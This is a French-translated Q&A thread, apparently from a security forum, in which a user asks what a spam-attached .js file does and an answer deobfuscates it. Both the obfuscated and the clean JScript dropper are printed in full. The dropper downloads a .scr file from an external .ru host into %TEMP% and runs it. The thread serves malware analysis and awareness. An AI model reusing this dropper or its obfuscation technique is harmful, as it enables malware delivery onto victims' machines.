Que fait ce bit de javascript? Cela a été marqué par ESET comme trojan

Question

J'ai reçu un spam contenant une pièce jointe avec un fichier .js, et par curiosité je l'ai ouvert dans le bloc-notes (ne l'ai pas exécuté bien sûr). A dû désactiver temporairement ESET car il marquait cela comme un cheval de Troie. Je me demandais ce que cela fait en fait:

autonomousRadio = eval(('transport', 'caste', 'acoustic', 'primitive', 'absurd', 'clip', '\u0074phenomenon'.e()) + 'h' + ('station', '\u0069program(me)'.e()) + 's'); 
autonomousRadio = autonomousRadio[('barbarian', '\u0041ruin'.e()) + 'ct' + ('state', 'prologue', 'accompany', 'orientation', 'chance', 'unison', '\u0069cyclone'.e()) + 've' + ('modify', 'instruction', 'perspective', '\u0058depot'.e()) + 'O' + ('intellect', 'guide', 'delegation', 'invalid', '\u0062order'.e()) + 'je' + ('pill', 'revue', 'compress', 'commerce', '\u0063sponsor'.e()) + 't']; 
skeletonArcade = ('major', '\u0052discrete'.e()) + 'un'; 

function String.prototype.e(a) { 
    return this.charAt(a); 
} 
phaseMemorial = new autonomousRadio(('dogma', 'literature', '\u0057handicap'.e()) + 'S' + ('beach', 'reform', 'duplicate', 'obligation', 'gram(me)', '\u0063origin'.e()) + 'ri' + ('aspect', 'finish', 'cycle', 'military', 'universal', 'citation', '\u0070association'.e()) + 't.' + ('document', 'solo', 'simulate', 'potentiality', 'statue', 'episode', '\u0053vacancy'.e()) + 'he' + ('detail', 'contact', 'triumph', 'nose', '\u006caccord'.e()) + 'l'); 
tribuneApparatus = phaseMemorial[('emotion', 'practice', '\u0045pseudonym'.e()) + 'xp' + ('project', 'acoustic', 'absolute', 'version', '\u0061morphology'.e()) + 'nd' + ('permanent', 'occupy', '\u0045cabin'.e()) + 'nv' + ('voyage', 'park', 'dialect', '\u0069emission'.e()) + 'ro' + ('superman', '\u006esubstance'.e()) + 'm' + ('intelligence', 'disk', 'tick', 'rocket', 'perspective', 'opposite', '\u0065match'.e()) + 'nt' + ('communication', 'order', '\u0053computer'.e()) + 't' + ('collection', '\u0072gallery'.e()) + 'in' + ('method', 'regent', 'communication', 'memoirs', 'forum', '\u0067mechanic'.e()) + 's'](('natural', 'refrigerator', 'stadium', 'station', 'opposite', 'double', '\u0025captain'.e()) + 'TE' + ('scandal', '\u004dblock'.e()) + 'P%' + ('focus', 'start', 'zone', '\u002forientation'.e()) + '') + "XFxuhJaJ" + ('selective', '\u002einformer'.e()) + 'sc' + ('vocal', 'public', 'speculation', 'mechanic', '\u0072balance'.e()) + ''; 
classificationHospital = new autonomousRadio(('aspect', 'tract', 'bottle', '\u004dthermometer'.e()) + 'SX' + ('container', 'universe', 'decoration', 'file', 'resolution', '\u004dhotel'.e()) + 'L2' + ('resistor', 'square', '\u002ecensor'.e()) + 'X' + ('examination', 'collect', 'formation', 'distant', 'sexual', 'filter', '\u004dalternative'.e()) + 'LH' + ('bomber', 'amplitude', 'declaration', 'collector', 'veto', 'illegal', '\u0054boss'.e()) + 'TP'); 
classificationHospital[('globe', '\u006fregent'.e()) + 'p' + ('metaphor', 'spindle', 'record', 'protector', 'patrol', '\u0065order'.e()) + 'n'](('medicine', '\u0047conception'.e()) + 'E' + ('modal', 'aquarium', 'cube', 'ocean', 'radical', 'bureau', '\u0054qualification'.e()) + '', ('tradition', 'regular', 'specification', '\u0068attestation'.e()) + 'tt' + ('investment', '\u0070directive'.e()) + ':' + ('solo', 'dialogue', '\u002fvacuum'.e()) + '/m' + ('nose', 'inspection', 'translator', 'balloon', 'problem', 'censor', '\u006fabsurd'.e()) + 'n' + ('cyclone', 'simulate', '\u0064university'.e()) + 'e' + ('reflection', 'sphere', 'manager', 'mark', '\u0072printer'.e()) + 'o.' + ('produce', '\u0072arbiter'.e()) + 'u' + ('deposit', '\u002fcooperation'.e()) + 's' + ('regularity', 'flag', '\u0079solo'.e()) + 's' + ('translation', 'technology', '\u0074literature'.e()) + 'em' + ('radical', '\u002fcomment'.e()) + 'lo' + ('photograph', 'moral', 'instance', 'limit', 'arctic', '\u0067unison'.e()) + 's' + ('administration', 'subjective', 'prologue', 'globe', '\u002fadequate'.e()) + '5' + ('interval', 'criteria', 'false', 'skeleton', '\u0036balloon'.e()) + 'y4' + ('anonymous', '\u0067licence'.e()) + '45' + ('plus', '\u0067game'.e()) + 'h' + ('audience', 'story', 'cocoon', 'minimal', '\u0034firm'.e()) + '5' + ('modal', 'test', 'mile', 'indifferent', '\u0068period'.e()) + '', ((1 & 1) + (1 * 0)) == ((1 | 1) & (0 & 1))); 
classificationHospital[('permanent', 'megaphone', 'tick', '\u0073syntax'.e()) + 'en' + ('academic', 'interpret', 'test', 'arbiter', 'trilogy', '\u0064negative'.e()) + ''](); 
while (classificationHospital[('transportation', 'dialogue', 'control', 'amphibian', '\u0072cardinal'.e()) + 'e' + ('metal', 'radical', 'balance', 'author', '\u0061portal'.e()) + 'dy' + ('diagram', 'numeral', 'visa', 'tick', '\u0073band'.e()) + 'ta' + ('yard', 'primitive', 'special', 'intellect', 'original', 'tablet', '\u0074illustrate'.e()) + 'e'] < ((2^1)^(1 | 6))) { 
    this[('administration', 'bomber', 'culture', 'delegate', 'centre', 'individuality', '\u0057recipe'.e()) + 'Sc' + ('laboratory', 'storm', 'archive', 'board', 'mate', 'occupy', '\u0072impression'.e()) + 'i' + ('filter', 'cocoon', 'linguist', 'clan', '\u0070cooperation'.e()) + 't'][('practical', '\u0053robot'.e()) + 'le' + ('variation', '\u0065technique'.e()) + 'p'](((3384/36) + (5 + 1))); 
} 
commandOccupy = new autonomousRadio(('censor', '\u0041guide'.e()) + 'D' + ('boxing', 'artillery', 'ocean', 'passion', '\u004ftransform'.e()) + 'DB' + ('intelligence', 'conception', 'cipher', 'motif', 'secret', '\u002emoment'.e()) + 'St' + ('refrigerator', 'vacuum', '\u0072lexicon'.e()) + 'ea' + ('delegation', 'rank', 'radiation', 'cortege', '\u006dplatform'.e()) + ''); 
try { 
    commandOccupy[('sexual', 'context', 'present', '\u006finfection'.e()) + 'p' + ('aggregate', 'action', 'prize', 'pretension', 'resource', '\u0065cabinet'.e()) + 'n'](); 
    commandOccupy[('provocation', 'rational', 'memoirs', 'limit', 'amputate', 'department', '\u0074interpretation'.e()) + 'yp' + ('bandit', '\u0065section'.e()) + ''] = ((0/16)^(52 - 51)); 
    commandOccupy[('assistant', 'inversion', 'prize', 'injection', 'dictator', 'transcription', '\u0077bisexual'.e()) + 'ri' + ('student', 'reserve', 'figure', '\u0074net'.e()) + 'e'](classificationHospital[('radiation', '\u0052generation'.e()) + 'e' + ('bazaar', 'popular', 'translation', '\u0073captain'.e()) + 'po' + ('profile', 'active', 'medicine', '\u006emate'.e()) + 'se' + ('operate', 'document', 'arctic', '\u0042analogy'.e()) + 'od' + ('cathedral', '\u0079factor'.e()) + '']); 
    commandOccupy[('block', '\u0070project'.e()) + 'os' + ('square', 'filter', 'vertical', 'variant', '\u0069selection'.e()) + 't' + ('relaxation', 'decade', 'negative', 'cent', '\u0069variant'.e()) + 'on'] = ((0 & 1) & (1 | 0)); 
    try { 
     commandOccupy[('literature', 'industrial', 'assortment', 'autograph', 'refrigerator', '\u0073boss'.e()) + 'a' + ('buffer', 'dog', 'public', '\u0076lord'.e()) + 'e' + ('collect', 'abstract', 'initiative', 'arctic', 'focus', 'incident', '\u0054amortization'.e()) + 'o' + ('precedent', 'transport', 'scandal', 'confidential', '\u0046block'.e()) + 'il' + ('solo', 'delta', 'defect', 'terminology', 'fortune', 'agent', '\u0065arbiter'.e()) + ''](tribuneApparatus, ((2^0) | (0 + 0))); 
     commandOccupy[('collective', 'shorts', 'bazaar', '\u0063project'.e()) + 'l' + ('terminology', 'collective', 'indifferent', 'veto', 'numeration', 'statuette', '\u006factor'.e()) + 'se'](); 
     phaseMemorial[skeletonArcade](tribuneApparatus); 
    } catch (arbiterApproximation) {}; 
} catch (arbiterApproximation) {}; 

apprécieraient si quelqu'un pourrait avoir un bref aperçu et expliquer ce que cela est censé faire!

Merci

Answer 1

obfuscation Intéressant, beaucoup utilisation du comma operator. Notez que

function String.prototype.e(a) { 
    return this.charAt(a); 
} 

est syntaxiquement JavaScript valide, mais fonctionne dans (peut-être que les anciennes versions) Jscript (voir here, page 69). Ces appels .e() obtiennent simplement le premier caractère de la chaîne respective.

Retrait de l'obscurcissement en utilisant l'extrait

code.replace(/\\u([0-9a-f]{4})/g, function(_, c) { return String.fromCharCode(parseInt(c, 16)); }) 
    .replace(/\((?:'[^']*',\s*)*'(.)[^']*'\.e\(\)\)/g, "'$1'") 
    .replace(/'\s*\+\s*'/g, "") 

c'est ce que vous obtiendrez (ne pas courir ce!):

autonomousRadio = eval('this'); 
autonomousRadio = autonomousRadio['ActiveXObject']; 
skeletonArcade = 'Run'; 
phaseMemorial = new autonomousRadio('WScript.Shell'); 
tribuneApparatus = phaseMemorial['ExpandEnvironmentStrings']('%TEMP%/') + "XFxuhJaJ" + '.scr'; 
classificationHospital = new autonomousRadio('MSXML2.XMLHTTP'); 
classificationHospital['open']('GET', 'http://mondero.ru/system/logs/56y4g45gh45h', ((1 & 1) + (1 * 0)) == ((1 | 1) & (0 & 1))); 
classificationHospital['send'](); 
while (classificationHospital['readystate'] < ((2^1)^(1 | 6))) { 
    this['WScript']['Sleep'](((3384/36) + (5 + 1))); 
} 
commandOccupy = new autonomousRadio('ADODB.Stream'); 
try { 
    commandOccupy['open'](); 
    commandOccupy['type'] = ((0/16)^(52 - 51)); 
    commandOccupy['write'](classificationHospital['ResponseBody']); 
    commandOccupy['position'] = ((0 & 1) & (1 | 0)); 
    try { 
     commandOccupy['saveToFile'](tribuneApparatus, ((2^0) | (0 + 0))); 
     commandOccupy['close'](); 
     phaseMemorial[skeletonArcade](tribuneApparatus); 
    } catch (arbiterApproximation) {}; 
} catch (arbiterApproximation) {}; 

Oui, cela est clairement un cheval de Troie, en téléchargeant un .scr file de ce domaine russe sur votre ordinateur.